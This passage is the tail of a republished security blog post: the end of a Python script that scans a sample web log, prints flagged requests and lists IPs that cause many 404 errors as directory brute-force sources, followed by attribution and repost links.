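    brute = sorted(ip for ip, n in not_found.items() if n >= brute_threshold)
    return {"flagged": flagged, "dir_bruteforce_sources": brute}


if __name__ == "__main__":
    report = analyse(SAMPLE_LOG)
    for ip, path, why in report["flagged"]:
        print(f"{why:20} {ip:16} {path}")
    print("directory brute-force sources:", report["dir_bruteforce_sources"])
```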

Author: Jason_huawen

Original post: https://www.cnblogs.com/jason-huawen/p/17302391.html
Republished on CN-SEC (keep this link when reposting; thanks to the original author): https://cn-sec.com/archives/1684261.html